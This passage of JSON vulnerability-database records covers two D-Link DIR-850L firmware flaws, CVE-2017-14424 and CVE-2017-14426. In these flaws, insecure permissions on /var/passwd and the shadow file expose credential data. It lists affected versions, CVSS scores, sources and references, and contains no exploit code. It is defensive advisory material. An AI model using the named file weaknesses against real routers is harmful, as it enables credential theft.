"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14424"
}
]
},
"cve": "CVE-2017-14424",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14424",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2017-31785",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-105145",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14424",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14424",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31785",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-571",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105145",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/passwd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit the vulnerability to obtain a certificate",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14424",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31785",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105145",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"id": "VAR-201709-0595",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
}
]
},
"last_update_date": "2023-12-18T13:29:10.322000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100051"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-276",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14424"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14424"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"db": "VULHUB",
"id": "VHN-105145"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105145"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"date": "2017-09-13T17:29:00.633000",
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31785"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105145"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008099"
},
{
"date": "2023-11-17T20:00:53.310000",
"db": "NVD",
"id": "CVE-2017-14424"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008099"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-571"
}
],
"trust": 0.6
}
}
VAR-201709-0597
Vulnerability from variot - Updated: 2023-12-18 13:29D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0644 /var/etc/shadow (aka the /etc/shadow symlink target) permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit this vulnerability to obtain a DES hash of an administrator user
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0597",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "fw208wwb02"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw208wwb02"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "rev.b \u003c=fw208wwb02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw208wwb02"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "fw208wwb02",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14426"
}
]
},
"cve": "CVE-2017-14426",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.1,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-14426",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CNVD-2017-31783",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-105147",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14426",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14426",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31783",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-569",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105147",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0644 /var/etc/shadow (aka the /etc/shadow symlink target) permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit this vulnerability to obtain a DES hash of an administrator user",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14426",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31783",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105147",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"id": "VAR-201709-0597",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
}
]
},
"last_update_date": "2023-12-18T13:29:10.294000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A and REV.B Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100049"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105147"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14426"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14426"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"db": "VULHUB",
"id": "VHN-105147"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105147"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"date": "2017-09-13T17:29:00.760000",
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31783"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105147"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008101"
},
{
"date": "2023-11-17T20:00:16.387000",
"db": "NVD",
"id": "CVE-2017-14426"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-569"
}
]
},
